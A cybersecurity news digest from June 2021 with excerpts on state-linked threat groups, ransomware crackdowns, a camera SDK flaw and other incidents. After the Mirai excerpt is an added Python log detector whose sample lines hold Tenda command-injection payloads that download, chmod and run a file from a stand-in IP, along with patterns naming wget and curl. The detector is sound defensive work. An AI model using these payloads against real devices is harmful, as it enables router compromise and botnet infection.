OSN June 16, 2021

Fortify Security Team
Jun 16, 2021

Title: Threat Activity Group RedFoxtrot Linked to China’s PLA Unit 69010; Targets Bordering Asian Countries
Date Published: June 16, 2021

https://www.recordedfuture.com/redfoxtrot-china-pla-targets-bordering-asian-countries/

Excerpt: “Recorded Future’s Insikt Group has identified ties between a suspected Chinese state-sponsored threat activity group we track as RedFoxtrot and the Chinese military intelligence apparatus, specifically People’s Liberation Army (PLA) Unit 69010 located in Ürümqi, Xinjiang. This activity offers a glimpse into PLA operations following a major organizational restructure beginning in 2015 and follows a period where public reporting has largely concentrated on groups affiliated with China’s Ministry of State Security (MSS).”

Title: Ferocious Kitten: 6 Years of Covert Surveillance in Iran
Date Published: June 16, 2021

https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

Excerpt: “Additionally, such groups are known to target various platforms (most notably Windows and Android) and often share TTPs, as indicated in this report. The latter in particular may suggest that the underlying actors may be interconnected, sharing developers or operating under a mutual supervisor. While not technically impressive, it’s interesting that the actor created specialized variants to be launched alongside popular programs, namely Chrome and Telegram.”

Title: AT&T Report: Malware Hosting Domain Cyberium Fanning out Mirai Variants
Date Published: June 14, 2021

https://cybersecurity.att.com/blogs/labs-research/malware-hosting-domain-cyberium-fanning-out-mirai-variants

Excerpt: “During the end of March, AT&T Alien Labs observed a spike in exploitation attempts for Tenda Remote Code Execution (RCE) vulnerability CVE-2020-10987. This spike was observed throughout a significant number of clients, in the space of a few hours. This vulnerability is not commonly used by web scanners and was barely detected by our honeypots during the last six months, except for a minor peak in November. This exploit can be identified by the URL that is requested, which includes ‘setUsbUnload’ with the payload assigned to the vulnerable parameter ‘deviceName’. This payload contains the logic to change the execution path to a temporary location, wget a file from a malware hosting page, provide execution permissions, and execute it.”
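The identification rule quoted above (a request whose URL contains "setUsbUnload" and whose "deviceName" parameter carries a change-directory, wget, chmod, execute chain) can be turned into a log check. What follows is an added example, not code from the AT&T Alien Labs write-up: the "/goform/" path prefix is assumed (the detection itself only keys on the "setUsbUnload" substring the article names), the log lines are constructed for the example, and the addresses are taken from RFC 5737 documentation ranges rather than real infrastructure.

```python
"""Flag CVE-2020-10987-style Tenda 'setUsbUnload' injection attempts in access logs.

Added example, not code from the AT&T Alien Labs write-up. It keys on the two traits
quoted in the article: the requested URL contains 'setUsbUnload' and the 'deviceName'
parameter carries a shell chain (cd to a temp dir, wget a file, chmod it, run it).
The '/goform/' prefix and every log line below are constructed for this example;
the addresses are RFC 5737 documentation ranges, not real infrastructure.
"""
import re
from urllib.parse import unquote_plus

# Common Log Format: client ident user [time] "METHOD target PROTO" status bytes
CLF_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell metacharacters or download/exec tooling inside what should be a device name.
INJECT_RE = re.compile(r'[;|&`$]|\b(?:wget|curl|chmod|busybox)\b')
# First URL argument handed to wget/curl (scheme optional), for IOC extraction.
FETCH_RE = re.compile(
    r'\b(?:wget|curl)\b[^;|&]*?\s(?P<url>(?:https?://)?[\w.-]+(?::\d+)?/[^\s;|&\'"]*)'
)

# Constructed sample log: a raw-semicolon chain, a legitimate call, an unrelated
# request, and a backtick-injected fetch with URL-encoded spaces.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Mar/2021:10:15:02 +0000] "GET /goform/setUsbUnload'
    '?deviceName=A;cd%20/tmp;wget%20http://198.51.100.7/arm7;chmod%20777%20arm7;./arm7'
    ' HTTP/1.1" 200 3',
    '192.0.2.20 - - [28/Mar/2021:10:16:44 +0000] "GET /goform/setUsbUnload'
    '?deviceName=sda1 HTTP/1.1" 200 12',
    '192.0.2.30 - - [28/Mar/2021:10:17:01 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '192.0.2.40 - - [28/Mar/2021:10:18:09 +0000] "POST /goform/setUsbUnload'
    '?deviceName=%60wget%20198.51.100.7/x%20-O%20/tmp/x%60 HTTP/1.1" 200 3',
]


def parse_request(line):
    """Parse one CLF line; return None for lines that do not fit the format."""
    m = CLF_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {"client": m.group("client"), "method": m.group("method"),
            "path": path, "query": query, "status": int(m.group("status"))}


def get_param(query, name):
    """Decoded value of `name` from a raw query string, or None if absent.
    Split only on '&' (the server's own separator); parse_qs on older Pythons
    also splits on ';', which would shred a semicolon-chained payload."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_plus(value)
    return None


def detect_setusbunload(line):
    """Return a finding for a setUsbUnload request whose deviceName is a shell
    chain, else None. A legitimate call carries a bare device name such as sda1."""
    req = parse_request(line)
    if req is None or "setUsbUnload" not in req["path"]:
        return None
    payload = get_param(req["query"], "deviceName")
    if payload is None or not INJECT_RE.search(payload):
        return None
    fetch = FETCH_RE.search(payload)
    stages = [s for s in ("cd", "wget", "curl", "chmod") if re.search(rf"\b{s}\b", payload)]
    return {"client": req["client"], "method": req["method"], "payload": payload,
            "download_url": fetch.group("url") if fetch else None, "stages": stages}


def scan(lines):
    """Run the detector over an iterable of log lines and collect the findings."""
    return [f for f in map(detect_setusbunload, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['client']} {finding['method']} stages={finding['stages']} "
              f"fetch={finding['download_url']}")
```

The extracted download URL is the piece worth feeding onward: it is the malware-hosting location the article's payload wgets from, and collecting it across the spike is how a hosting domain such as the one described gets tied to the Mirai variants it serves. Note that the check is deliberately narrow (path substring plus metacharacters in one parameter) so that normal USB-unmount calls with a bare device name do not alert.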

Title: Avaddon Ransomware Gang Evaporates Amid Global Crackdowns
Date Published: June 16, 2021

https://threatpost.com/avaddon-ransomware-global-crackdowns/166968/

Excerpt: “Avaddon was believed to be operating within the Commonwealth of Independent States (former Soviet-bloc countries), meaning the group’s shutdown just happens to coincide with President Biden’s summit with Russian President Vladimir Putin, where officials said ransomware and cybersecurity will be discussed. Avaddon launched one of these punitive DDoS attacks against Australian-based telecom provider Schepisi Communication when it refused to pay up.”

Title: Ukraine Arrests Clop Ransomware Gang Members, Seizes Servers
Date Published: June 16, 2021

https://www.bleepingcomputer.com/news/security/ukraine-arrests-clop-ransomware-gang-members-seizes-servers/

Excerpt: “According to the Cyberpolice Department of the National Police of Ukraine the ransomware group is behind total financial damages of roughly $500 million. Based on Ukrainian police’s press release, it is not yet clear if the arrested individuals are affiliates or core members of the ransomware operation. Clop’s Tor payment site and data leak site are still operational, so it looks like the Clop ransomware operation has not been completely shut down at this time.”

Title: Critical ThroughTek Flaw Opens Millions of Connected Cameras to Eavesdropping
Date Published: June 16, 2021

https://thehackernews.com/2021/06/critical-throughtek-flaw-opens-millions.html

Excerpt: “‘Successful exploitation of this vulnerability could permit unauthorized access to sensitive information, such as camera audio/video feeds,’ CISA said in the alert. ThroughTek’s point-to-point (P2P) SDK is widely used by IoT devices with video surveillance or audio/video transmission capability such as IP cameras, baby and pet monitoring cameras, smart home appliances, and sensors to provide remote access to the media content over the internet.”

Title: Volkswagen, Audi Notify 3.3 Million of Data Breach
Date Published: June 15, 2021

https://www.bankinfosecurity.com/volkswagen-audi-notify-33-million-data-breach-a-16875

Excerpt: “More sensitive data, however, was leaked for 90,000 individuals in the United States. Volkswagen says the driver’s license numbers for most of those people were leaked. A smaller number within that group may have also had their birth dates, Social Security or social insurance numbers, account or loan numbers and tax identification numbers leaked, Volkswagen says. Affected individuals are being notified by either email or postal mail. Free credit protection services are being offered for anyone whose driver’s license number or other more sensitive data was exposed.”

Title: The First Step: Initial Access Leads to Ransomware
Date Published: June 16, 2021

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

Excerpt: “TA577 is a prolific cybercrime threat actor tracked by Proofpoint since mid-2020. This actor conducts broad targeting across various industries and geographies, and Proofpoint has observed TA577 deliver payloads including Qbot, IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike. Proofpoint assesses with high confidence TA577 is associated with a March 2021 Sodinokibi ransomware infection. TA577 initially compromised the victim via emails containing malicious Microsoft Office attachments, which, when macros are enabled, download and run IcedID. Activity observed by this actor increased 225% in the last six months.”

Title: Football Fever Puts Password Security at Risk
Date Published: June 16, 2021

https://www.infosecurity-magazine.com/news/football-fever-password-security/

Excerpt: “It claimed that of the one billion passwords in the trove, over 1.1 million are linked to the beautiful game. These are led by the password “football” (353,993), followed by “Liverpool” (215,842), “Chelsea” (172,727), “Arsenal” (151,936) and “Barcelona” (131,090). The problem for these users is two-fold: not only are such credentials relatively easy to guess or crack, but if they’re reused across multiple accounts, including corporate ones, it could expose them to credential stuffing.”

Title: Will “Data Poisoning” Be a Particularly Dangerous Type of Computer-Made Misinformation?
Date Published: June 16, 2021

https://medium.com/deepnews-ai/will-data-poisoning-be-a-particularly-dangerous-type-of-computer-made-misinformation-50a1fb7a7993

Excerpt: “It turns out that current methods of generating fake news with a machine, even using a model that pre-dates recent advances like GPT-3, Google’s LaMDA or Wu Dao in China, are good enough to fool cybersecurity analysts who had worked in the field for years. They were able to identify only around 21% of the fake reports as fake, worse than chance. The researchers said that this batch of correctly identified fake reports also happened to be the ones that had more “linguistic deficiencies” than the ones that analysts thought were true.”
